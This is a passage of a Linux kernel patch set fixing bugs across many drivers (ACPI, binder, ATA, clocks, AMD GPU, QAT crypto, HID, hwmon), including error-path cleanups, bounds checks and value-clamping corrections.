+index 6737b1cbf6d69..8bd5c4fa91f28 100644
+--- a/drivers/acpi/acpi_processor.c
++++ b/drivers/acpi/acpi_processor.c
+@@ -373,7 +373,7 @@ static int acpi_processor_add(struct acpi_device *device,
+ 
+ 	result = acpi_processor_get_info(device);
+ 	if (result) /* Processor is not physically present or unavailable */
+-		return 0;
++		goto err_clear_driver_data;
+ 
+ 	BUG_ON(pr->id >= nr_cpu_ids);
+ 
+@@ -388,7 +388,7 @@ static int acpi_processor_add(struct acpi_device *device,
+ 			"BIOS reported wrong ACPI id %d for the processor\n",
+ 			pr->id);
+ 		/* Give up, but do not abort the namespace scan. */
+-		goto err;
++		goto err_clear_driver_data;
+ 	}
+ 	/*
+ 	 * processor_device_array is not cleared on errors to allow buggy BIOS
+@@ -400,12 +400,12 @@ static int acpi_processor_add(struct acpi_device *device,
+ 	dev = get_cpu_device(pr->id);
+ 	if (!dev) {
+ 		result = -ENODEV;
+-		goto err;
++		goto err_clear_per_cpu;
+ 	}
+ 
+ 	result = acpi_bind_one(dev, device);
+ 	if (result)
+-		goto err;
++		goto err_clear_per_cpu;
+ 
+ 	pr->dev = dev;
+ 
+@@ -416,10 +416,11 @@ static int acpi_processor_add(struct acpi_device *device,
+ 	dev_err(dev, "Processor driver could not be attached\n");
+ 	acpi_unbind_one(dev);
+ 
+- err:
+-	free_cpumask_var(pr->throttling.shared_cpu_map);
+-	device->driver_data = NULL;
++ err_clear_per_cpu:
+ 	per_cpu(processors, pr->id) = NULL;
++ err_clear_driver_data:
++	device->driver_data = NULL;
++	free_cpumask_var(pr->throttling.shared_cpu_map);
+  err_free_pr:
+ 	kfree(pr);
+ 	return result;
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e0ef648df265b..931aa2609f3b6 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -3329,6 +3329,7 @@ static void binder_transaction(struct binder_proc *proc,
+ 		 */
+ 		copy_size = object_offset - user_offset;
+ 		if (copy_size && (user_offset > object_offset ||
++				object_offset > tr->data_size ||
+ 				binder_alloc_copy_user_to_buffer(
+ 					&target_proc->alloc,
+ 					t->buffer, user_offset,
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 826d9a102a51a..14bcfebf20b8f 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5532,8 +5532,10 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 	}
+ 
+ 	dr = devres_alloc(ata_devres_release, 0, GFP_KERNEL);
+-	if (!dr)
++	if (!dr) {
++		kfree(host);
+ 		goto err_out;
++	}
+ 
+ 	devres_add(dev, dr);
+ 	dev_set_drvdata(dev, host);
+diff --git a/drivers/ata/pata_macio.c b/drivers/ata/pata_macio.c
+index 9ccaac9e2bc31..f19ede2965a15 100644
+--- a/drivers/ata/pata_macio.c
++++ b/drivers/ata/pata_macio.c
+@@ -540,7 +540,8 @@ static enum ata_completion_errors pata_macio_qc_prep(struct ata_queued_cmd *qc)
+ 
+ 		while (sg_len) {
+ 			/* table overflow should never happen */
+-			BUG_ON (pi++ >= MAX_DCMDS);
++			if (WARN_ON_ONCE(pi >= MAX_DCMDS))
++				return AC_ERR_SYSTEM;
+ 
+ 			len = (sg_len < MAX_DBDMA_SEG) ? sg_len : MAX_DBDMA_SEG;
+ 			table->command = cpu_to_le16(write ? OUTPUT_MORE: INPUT_MORE);
+@@ -552,11 +553,13 @@ static enum ata_completion_errors pata_macio_qc_prep(struct ata_queued_cmd *qc)
+ 			addr += len;
+ 			sg_len -= len;
+ 			++table;
++			++pi;
+ 		}
+ 	}
+ 
+ 	/* Should never happen according to Tejun */
+-	BUG_ON(!pi);
++	if (WARN_ON_ONCE(!pi))
++		return AC_ERR_SYSTEM;
+ 
+ 	/* Convert the last command to an input/output */
+ 	table--;
+diff --git a/drivers/base/devres.c b/drivers/base/devres.c
+index f9add2ecdc554..35d1e2864696f 100644
+--- a/drivers/base/devres.c
++++ b/drivers/base/devres.c
+@@ -564,6 +564,7 @@ void * devres_open_group(struct device *dev, void *id, gfp_t gfp)
+ 	grp->id = grp;
+ 	if (id)
+ 		grp->id = id;
++	grp->color = 0;
+ 
+ 	spin_lock_irqsave(&dev->devres_lock, flags);
+ 	add_dr(dev, &grp->node[0]);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 3fa74051f31b4..bfd643856f647 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1915,6 +1915,8 @@ static int ublk_ctrl_start_recovery(struct ublk_device *ub,
+ 	mutex_lock(&ub->mutex);
+ 	if (!ublk_can_use_recovery(ub))
+ 		goto out_unlock;
++	if (!ub->nr_queues_ready)
++		goto out_unlock;
+ 	/*
+ 	 * START_RECOVERY is only allowd after:
+ 	 *
+diff --git a/drivers/clk/qcom/clk-alpha-pll.c b/drivers/clk/qcom/clk-alpha-pll.c
+index 1973d79c94655..391b8da8849bd 100644
+--- a/drivers/clk/qcom/clk-alpha-pll.c
++++ b/drivers/clk/qcom/clk-alpha-pll.c
+@@ -40,7 +40,7 @@
+ 
+ #define PLL_USER_CTL(p)		((p)->offset + (p)->regs[PLL_OFF_USER_CTL])
+ # define PLL_POST_DIV_SHIFT	8
+-# define PLL_POST_DIV_MASK(p)	GENMASK((p)->width, 0)
++# define PLL_POST_DIV_MASK(p)	GENMASK((p)->width - 1, 0)
+ # define PLL_ALPHA_EN		BIT(24)
+ # define PLL_ALPHA_MODE		BIT(25)
+ # define PLL_VCO_SHIFT		20
+@@ -1421,8 +1421,8 @@ clk_trion_pll_postdiv_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	}
+ 
+ 	return regmap_update_bits(regmap, PLL_USER_CTL(pll),
+-				  PLL_POST_DIV_MASK(pll) << PLL_POST_DIV_SHIFT,
+-				  val << PLL_POST_DIV_SHIFT);
++				  PLL_POST_DIV_MASK(pll) << pll->post_div_shift,
++				  val << pll->post_div_shift);
+ }
+ 
+ const struct clk_ops clk_alpha_pll_postdiv_trion_ops = {
+diff --git a/drivers/clocksource/timer-imx-tpm.c b/drivers/clocksource/timer-imx-tpm.c
+index bd64a8a8427f3..92c025b70eb62 100644
+--- a/drivers/clocksource/timer-imx-tpm.c
++++ b/drivers/clocksource/timer-imx-tpm.c
+@@ -83,20 +83,28 @@ static u64 notrace tpm_read_sched_clock(void)
+ static int tpm_set_next_event(unsigned long delta,
+ 				struct clock_event_device *evt)
+ {
+-	unsigned long next, now;
++	unsigned long next, prev, now;
+ 
+-	next = tpm_read_counter();
+-	next += delta;
++	prev = tpm_read_counter();
++	next = prev + delta;
+ 	writel(next, timer_base + TPM_C0V);
+ 	now = tpm_read_counter();
+ 
++	/*
++	 * Need to wait CNT increase at least 1 cycle to make sure
++	 * the C0V has been updated into HW.
++	 */
++	if ((next & 0xffffffff) != readl(timer_base + TPM_C0V))
++		while (now == tpm_read_counter())
++			;
++
+ 	/*
+ 	 * NOTE: We observed in a very small probability, the bus fabric
+ 	 * contention between GPU and A7 may results a few cycles delay
+ 	 * of writing CNT registers which may cause the min_delta event got
+ 	 * missed, so we need add a ETIME check here in case it happened.
+ 	 */
+-	return (int)(next - now) <= 0 ? -ETIME : 0;
++	return (now - prev) >= delta ? -ETIME : 0;
+ }
+ 
+ static int tpm_set_state_oneshot(struct clock_event_device *evt)
+diff --git a/drivers/clocksource/timer-of.c b/drivers/clocksource/timer-of.c
+index c3f54d9912be7..420202bf76e42 100644
+--- a/drivers/clocksource/timer-of.c
++++ b/drivers/clocksource/timer-of.c
+@@ -25,10 +25,7 @@ static __init void timer_of_irq_exit(struct of_timer_irq *of_irq)
+ 
+ 	struct clock_event_device *clkevt = &to->clkevt;
+ 
+-	if (of_irq->percpu)
+-		free_percpu_irq(of_irq->irq, clkevt);
+-	else
+-		free_irq(of_irq->irq, clkevt);
++	free_irq(of_irq->irq, clkevt);
+ }
+ 
+ /**
+@@ -42,9 +39,6 @@ static __init void timer_of_irq_exit(struct of_timer_irq *of_irq)
+  * - Get interrupt number by name
+  * - Get interrupt number by index
+  *
+- * When the interrupt is per CPU, 'request_percpu_irq()' is called,
+- * otherwise 'request_irq()' is used.
+- *
+  * Returns 0 on success, < 0 otherwise
+  */
+ static __init int timer_of_irq_init(struct device_node *np,
+@@ -69,12 +63,9 @@ static __init int timer_of_irq_init(struct device_node *np,
+ 		return -EINVAL;
+ 	}
+ 
+-	ret = of_irq->percpu ?
+-		request_percpu_irq(of_irq->irq, of_irq->handler,
+-				   np->full_name, clkevt) :
+-		request_irq(of_irq->irq, of_irq->handler,
+-			    of_irq->flags ? of_irq->flags : IRQF_TIMER,
+-			    np->full_name, clkevt);
++	ret = request_irq(of_irq->irq, of_irq->handler,
++			  of_irq->flags ? of_irq->flags : IRQF_TIMER,
++			  np->full_name, clkevt);
+ 	if (ret) {
+ 		pr_err("Failed to request irq %d for %pOF\n", of_irq->irq, np);
+ 		return ret;
+diff --git a/drivers/clocksource/timer-of.h b/drivers/clocksource/timer-of.h
+index a5478f3e8589d..01a2c6b7db065 100644
+--- a/drivers/clocksource/timer-of.h
++++ b/drivers/clocksource/timer-of.h
+@@ -11,7 +11,6 @@
+ struct of_timer_irq {
+ 	int irq;
+ 	int index;
+-	int percpu;
+ 	const char *name;
+ 	unsigned long flags;
+ 	irq_handler_t handler;
+diff --git a/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c b/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
+index 70ef119639381..43af81fcab868 100644
+--- a/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
++++ b/drivers/crypto/qat/qat_common/adf_gen2_pfvf.c
+@@ -100,7 +100,9 @@ static u32 adf_gen2_disable_pending_vf2pf_interrupts(void __iomem *pmisc_addr)
+ 	errmsk3 |= ADF_GEN2_ERR_MSK_VF2PF(ADF_GEN2_VF_MSK);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 
+-	errmsk3 &= ADF_GEN2_ERR_MSK_VF2PF(sources | disabled);
++	/* Update only section of errmsk3 related to VF2PF */
++	errmsk3 &= ~ADF_GEN2_ERR_MSK_VF2PF(ADF_GEN2_VF_MSK);
++	errmsk3 |= ADF_GEN2_ERR_MSK_VF2PF(sources | disabled);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 
+ 	/* Return the sources of the (new) interrupt(s) */
+diff --git a/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c b/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
+index cb3bdd3618fb0..85295c7ee0e0f 100644
+--- a/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
++++ b/drivers/crypto/qat/qat_dh895xcc/adf_dh895xcc_hw_data.c
+@@ -180,8 +180,12 @@ static u32 disable_pending_vf2pf_interrupts(void __iomem *pmisc_addr)
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK5, errmsk5);
+ 
+-	errmsk3 &= ADF_DH895XCC_ERR_MSK_VF2PF_L(sources | disabled);
+-	errmsk5 &= ADF_DH895XCC_ERR_MSK_VF2PF_U(sources | disabled);
++	/* Update only section of errmsk3 and errmsk5 related to VF2PF */
++	errmsk3 &= ~ADF_DH895XCC_ERR_MSK_VF2PF_L(ADF_DH895XCC_VF_MSK);
++	errmsk5 &= ~ADF_DH895XCC_ERR_MSK_VF2PF_U(ADF_DH895XCC_VF_MSK);
++
++	errmsk3 |= ADF_DH895XCC_ERR_MSK_VF2PF_L(sources | disabled);
++	errmsk5 |= ADF_DH895XCC_ERR_MSK_VF2PF_U(sources | disabled);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK3, errmsk3);
+ 	ADF_CSR_WR(pmisc_addr, ADF_GEN2_ERRMSK5, errmsk5);
+ 
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 68005cce01360..cf4f4da0cb874 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -764,6 +764,9 @@ int cs_dsp_coeff_write_ctrl(struct cs_dsp_coeff_ctl *ctl,
+ 
+ 	lockdep_assert_held(&ctl->dsp->pwr_lock);
+ 
++	if (ctl->flags && !(ctl->flags & WMFW_CTL_FLAG_WRITEABLE))
++		return -EPERM;
++
+ 	if (len + off * sizeof(u32) > ctl->len)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpio/gpio-rockchip.c b/drivers/gpio/gpio-rockchip.c
+index 200e43a6f4b4f..3c1e303aaca88 100644
+--- a/drivers/gpio/gpio-rockchip.c
++++ b/drivers/gpio/gpio-rockchip.c
+@@ -713,6 +713,7 @@ static int rockchip_gpio_probe(struct platform_device *pdev)
+ 		return -ENODEV;
+ 
+ 	pctldev = of_pinctrl_get(pctlnp);
++	of_node_put(pctlnp);
+ 	if (!pctldev)
+ 		return -EPROBE_DEFER;
+ 
+diff --git a/drivers/gpio/gpio-zynqmp-modepin.c b/drivers/gpio/gpio-zynqmp-modepin.c
+index a0d69387c1532..2f3c9ebfa78d1 100644
+--- a/drivers/gpio/gpio-zynqmp-modepin.c
++++ b/drivers/gpio/gpio-zynqmp-modepin.c
+@@ -146,6 +146,7 @@ static const struct of_device_id modepin_platform_id[] = {
+ 	{ .compatible = "xlnx,zynqmp-gpio-modepin", },
+ 	{ }
+ };
++MODULE_DEVICE_TABLE(of, modepin_platform_id);
+ 
+ static struct platform_driver modepin_platform_driver = {
+ 	.driver = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index aabde6ebb190e..cd0bccc95205d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -873,8 +873,7 @@ static int check_tiling_flags_gfx6(struct amdgpu_framebuffer *afb)
+ {
+ 	u64 micro_tile_mode;
+ 
+-	/* Zero swizzle mode means linear */
+-	if (AMDGPU_TILING_GET(afb->tiling_flags, SWIZZLE_MODE) == 0)
++	if (AMDGPU_TILING_GET(afb->tiling_flags, ARRAY_MODE) == 1) /* LINEAR_ALIGNED */
+ 		return 0;
+ 
+ 	micro_tile_mode = AMDGPU_TILING_GET(afb->tiling_flags, MICRO_TILE_MODE);
+@@ -998,6 +997,30 @@ static int amdgpu_display_verify_sizes(struct amdgpu_framebuffer *rfb)
+ 			block_width = 256 / format_info->cpp[i];
+ 			block_height = 1;
+ 			block_size_log2 = 8;
++		} else if (AMD_FMT_MOD_GET(TILE_VERSION, modifier) >= AMD_FMT_MOD_TILE_VER_GFX12) {
++			int swizzle = AMD_FMT_MOD_GET(TILE, modifier);
++
++			switch (swizzle) {
++			case AMD_FMT_MOD_TILE_GFX12_256B_2D:
++				block_size_log2 = 8;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_4K_2D:
++				block_size_log2 = 12;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_64K_2D:
++				block_size_log2 = 16;
++				break;
++			case AMD_FMT_MOD_TILE_GFX12_256K_2D:
++				block_size_log2 = 18;
++				break;
++			default:
++				drm_dbg_kms(rfb->base.dev,
++					    "Gfx12 swizzle mode with unknown block size: %d\n", swizzle);
++				return -EINVAL;
++			}
++
++			get_block_dimensions(block_size_log2, format_info->cpp[i],
++					     &block_width, &block_height);
+ 		} else {
+ 			int swizzle = AMD_FMT_MOD_GET(TILE, modifier);
+ 
+@@ -1033,7 +1056,8 @@ static int amdgpu_display_verify_sizes(struct amdgpu_framebuffer *rfb)
+ 			return ret;
+ 	}
+ 
+-	if (AMD_FMT_MOD_GET(DCC, modifier)) {
++	if (AMD_FMT_MOD_GET(TILE_VERSION, modifier) <= AMD_FMT_MOD_TILE_VER_GFX11 &&
++	    AMD_FMT_MOD_GET(DCC, modifier)) {
+ 		if (AMD_FMT_MOD_GET(DCC_RETILE, modifier)) {
+ 			block_size_log2 = get_dcc_block_size(modifier, false, false);
+ 			get_block_dimensions(block_size_log2 + 8, format_info->cpp[0],
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+index af50e6ce39e17..d7b76a3d2d558 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_virt.c
+@@ -132,8 +132,10 @@ int amdgpu_virt_request_full_gpu(struct amdgpu_device *adev, bool init)
+ 
+ 	if (virt->ops && virt->ops->req_full_gpu) {
+ 		r = virt->ops->req_full_gpu(adev, init);
+-		if (r)
++		if (r) {
++			adev->no_hw_access = true;
+ 			return r;
++		}
+ 
+ 		adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 1f9f7fdd4b8e0..c76895cca4d9a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -4330,11 +4330,11 @@ static int gfx_v11_0_hw_init(void *handle)
+ 			/* RLC autoload sequence 1: Program rlc ram */
+ 			if (adev->gfx.imu.funcs->program_rlc_ram)
+ 				adev->gfx.imu.funcs->program_rlc_ram(adev);
++			/* rlc autoload firmware */
++			r = gfx_v11_0_rlc_backdoor_autoload_enable(adev);
++			if (r)
++				return r;
+ 		}
+-		/* rlc autoload firmware */
+-		r = gfx_v11_0_rlc_backdoor_autoload_enable(adev);
+-		if (r)
+-			return r;
+ 	} else {
+ 		if (adev->firmware.load_type == AMDGPU_FW_LOAD_DIRECT) {
+ 			if (adev->gfx.imu.funcs && (amdgpu_dpm > 0)) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+index 657e4ca6f9dd2..fccbec438bbed 100644
+--- a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+@@ -135,6 +135,34 @@ static int ih_v6_0_toggle_ring_interrupts(struct amdgpu_device *adev,
+ 
+ 	tmp = RREG32(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, RB_ENABLE, (enable ? 1 : 0));
++
++	if (enable) {
++		/* Unset the CLEAR_OVERFLOW bit to make sure the next step
++		 * is switching the bit from 0 to 1
++		 */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++		if (amdgpu_sriov_vf(adev) && amdgpu_sriov_reg_indirect_ih(adev)) {
++			if (psp_reg_program(&adev->psp, ih_regs->psp_reg_id, tmp))
++				return -ETIMEDOUT;
++		} else {
++			WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++		}
++
++		/* Clear RB_OVERFLOW bit */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
++		if (amdgpu_sriov_vf(adev) && amdgpu_sriov_reg_indirect_ih(adev)) {
++			if (psp_reg_program(&adev->psp, ih_regs->psp_reg_id, tmp))
++				return -ETIMEDOUT;
++		} else {
++			WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++		}
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	}
++
+ 	/* enable_intr field is only valid in ring0 */
+ 	if (ih == &adev->irq.ih)
+ 		tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, ENABLE_INTR, (enable ? 1 : 0));
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 0be1a1149a3fe..393e32259a77c 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6767,7 +6767,7 @@ static int dm_update_mst_vcpi_slots_for_dsc(struct drm_atomic_state *state,
+ 			}
+ 		}
+ 
+-		if (j == dc_state->stream_count)
++		if (j == dc_state->stream_count || pbn_div == 0)
+ 			continue;
+ 
+ 		slot_num = DIV_ROUND_UP(pbn, pbn_div);
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
+index 1ddb4f5eac8e5..93c0455766ddb 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp1_execution.c
+@@ -433,17 +433,20 @@ static enum mod_hdcp_status authenticated_dp(struct mod_hdcp *hdcp,
+ 	}
+ 
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(mod_hdcp_read_bstatus,
++		if (!mod_hdcp_execute_and_set(mod_hdcp_read_bstatus,
+ 				&input->bstatus_read, &status,
+-				hdcp, "bstatus_read");
++				hdcp, "bstatus_read"))
++			goto out;
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(check_link_integrity_dp,
++		if (!mod_hdcp_execute_and_set(check_link_integrity_dp,
+ 				&input->link_integrity_check, &status,
+-				hdcp, "link_integrity_check");
++				hdcp, "link_integrity_check"))
++			goto out;
+ 	if (status == MOD_HDCP_STATUS_SUCCESS)
+-		mod_hdcp_execute_and_set(check_no_reauthentication_request_dp,
++		if (!mod_hdcp_execute_and_set(check_no_reauthentication_request_dp,
+ 				&input->reauth_request_check, &status,
+-				hdcp, "reauth_request_check");
++				hdcp, "reauth_request_check"))
++			goto out;
+ out:
+ 	return status;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 5d193872fd1ad..dfd653e1b6ad5 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -1871,7 +1871,8 @@ static int smu_adjust_power_state_dynamic(struct smu_context *smu,
+ 		smu_dpm_ctx->dpm_level = level;
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
++		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM) {
+ 		index = fls(smu->workload_mask);
+ 		index = index > 0 && index <= WORKLOAD_POLICY_MAX ? index - 1 : 0;
+ 		workload[0] = smu->workload_setting[index];
+@@ -1950,7 +1951,8 @@ static int smu_switch_power_profile(void *handle,
+ 		workload[0] = smu->workload_setting[index];
+ 	}
+ 
+-	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
++	if (smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_MANUAL &&
++		smu_dpm_ctx->dpm_level != AMD_DPM_FORCED_LEVEL_PERF_DETERMINISM)
+ 		smu_bump_power_profile_mode(smu, workload, 0);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/i915/i915_sw_fence.c b/drivers/gpu/drm/i915/i915_sw_fence.c
+index 6fc0d1b896902..e664f8e461e6d 100644
+--- a/drivers/gpu/drm/i915/i915_sw_fence.c
++++ b/drivers/gpu/drm/i915/i915_sw_fence.c
+@@ -51,7 +51,7 @@ static inline void debug_fence_init(struct i915_sw_fence *fence)
+ 	debug_object_init(fence, &i915_sw_fence_debug_descr);
+ }
+ 
+-static inline void debug_fence_init_onstack(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_init_onstack(struct i915_sw_fence *fence)
+ {
+ 	debug_object_init_on_stack(fence, &i915_sw_fence_debug_descr);
+ }
+@@ -77,7 +77,7 @@ static inline void debug_fence_destroy(struct i915_sw_fence *fence)
+ 	debug_object_destroy(fence, &i915_sw_fence_debug_descr);
+ }
+ 
+-static inline void debug_fence_free(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_free(struct i915_sw_fence *fence)
+ {
+ 	debug_object_free(fence, &i915_sw_fence_debug_descr);
+ 	smp_wmb(); /* flush the change in state before reallocation */
+@@ -94,7 +94,7 @@ static inline void debug_fence_init(struct i915_sw_fence *fence)
+ {
+ }
+ 
+-static inline void debug_fence_init_onstack(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_init_onstack(struct i915_sw_fence *fence)
+ {
+ }
+ 
+@@ -115,7 +115,7 @@ static inline void debug_fence_destroy(struct i915_sw_fence *fence)
+ {
+ }
+ 
+-static inline void debug_fence_free(struct i915_sw_fence *fence)
++static inline __maybe_unused void debug_fence_free(struct i915_sw_fence *fence)
+ {
+ }
+ 
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_hid.c b/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
+index 1b18291fc5afe..d682b99c25b1f 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_hid.c
+@@ -171,11 +171,13 @@ int amdtp_hid_probe(u32 cur_hid_dev, struct amdtp_cl_data *cli_data)
+ void amdtp_hid_remove(struct amdtp_cl_data *cli_data)
+ {
+ 	int i;
++	struct amdtp_hid_data *hid_data;
+ 
+ 	for (i = 0; i < cli_data->num_hid_devices; ++i) {
+ 		if (cli_data->hid_sensor_hubs[i]) {
+-			kfree(cli_data->hid_sensor_hubs[i]->driver_data);
++			hid_data = cli_data->hid_sensor_hubs[i]->driver_data;
+ 			hid_destroy_device(cli_data->hid_sensor_hubs[i]);
++			kfree(hid_data);
+ 			cli_data->hid_sensor_hubs[i] = NULL;
+ 		}
+ 	}
+diff --git a/drivers/hid/hid-cougar.c b/drivers/hid/hid-cougar.c
+index cb8bd8aae15b5..0fa785f52707a 100644
+--- a/drivers/hid/hid-cougar.c
++++ b/drivers/hid/hid-cougar.c
+@@ -106,7 +106,7 @@ static void cougar_fix_g6_mapping(void)
+ static __u8 *cougar_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 				 unsigned int *rsize)
+ {
+-	if (rdesc[2] == 0x09 && rdesc[3] == 0x02 &&
++	if (*rsize >= 117 && rdesc[2] == 0x09 && rdesc[3] == 0x02 &&
+ 	    (rdesc[115] | rdesc[116] << 8) >= HID_MAX_USAGES) {
+ 		hid_info(hdev,
+ 			"usage count exceeds max: fixing up report descriptor\n");
+diff --git a/drivers/hv/vmbus_drv.c b/drivers/hv/vmbus_drv.c
+index e9c3f1e826baa..a2191bc5c1535 100644
+--- a/drivers/hv/vmbus_drv.c
++++ b/drivers/hv/vmbus_drv.c
+@@ -1977,6 +1977,7 @@ static umode_t vmbus_chan_attr_is_visible(struct kobject *kobj,
+ 
+ 	return attr->mode;
+ }
++EXPORT_SYMBOL_GPL(vmbus_device_unregister);
+ 
+ static struct attribute_group vmbus_chan_group = {
+ 	.attrs = vmbus_chan_attrs,
+diff --git a/drivers/hwmon/adc128d818.c b/drivers/hwmon/adc128d818.c
+index 97b330b6c165c..bad2d39d9733a 100644
+--- a/drivers/hwmon/adc128d818.c
++++ b/drivers/hwmon/adc128d818.c
+@@ -176,7 +176,7 @@ static ssize_t adc128_in_store(struct device *dev,
+ 
+ 	mutex_lock(&data->update_lock);
+ 	/* 10 mV LSB on limit registers */
+-	regval = clamp_val(DIV_ROUND_CLOSEST(val, 10), 0, 255);
++	regval = DIV_ROUND_CLOSEST(clamp_val(val, 0, 2550), 10);
+ 	data->in[index][nr] = regval << 4;
+ 	reg = index == 1 ? ADC128_REG_IN_MIN(nr) : ADC128_REG_IN_MAX(nr);
+ 	i2c_smbus_write_byte_data(data->client, reg, regval);
+@@ -214,7 +214,7 @@ static ssize_t adc128_temp_store(struct device *dev,
+ 		return err;
+ 
+ 	mutex_lock(&data->update_lock);
+-	regval = clamp_val(DIV_ROUND_CLOSEST(val, 1000), -128, 127);
++	regval = DIV_ROUND_CLOSEST(clamp_val(val, -128000, 127000), 1000);
+ 	data->temp[index] = regval << 1;
+ 	i2c_smbus_write_byte_data(data->client,
+ 				  index == 1 ? ADC128_REG_TEMP_MAX
+diff --git a/drivers/hwmon/lm95234.c b/drivers/hwmon/lm95234.c
+index b4a9d0c223c4a..db570fe84132c 100644
+--- a/drivers/hwmon/lm95234.c
++++ b/drivers/hwmon/lm95234.c
+@@ -301,7 +301,8 @@ static ssize_t tcrit2_store(struct device *dev, struct device_attribute *attr,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, index ? 255 : 127);
++	val = DIV_ROUND_CLOSEST(clamp_val(val, 0, (index ? 255 : 127) * 1000),
++				1000);
+ 
+ 	mutex_lock(&data->update_lock);
+ 	data->tcrit2[index] = val;
+@@ -350,7 +351,7 @@ static ssize_t tcrit1_store(struct device *dev, struct device_attribute *attr,
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	val = clamp_val(DIV_ROUND_CLOSEST(val, 1000), 0, 255);
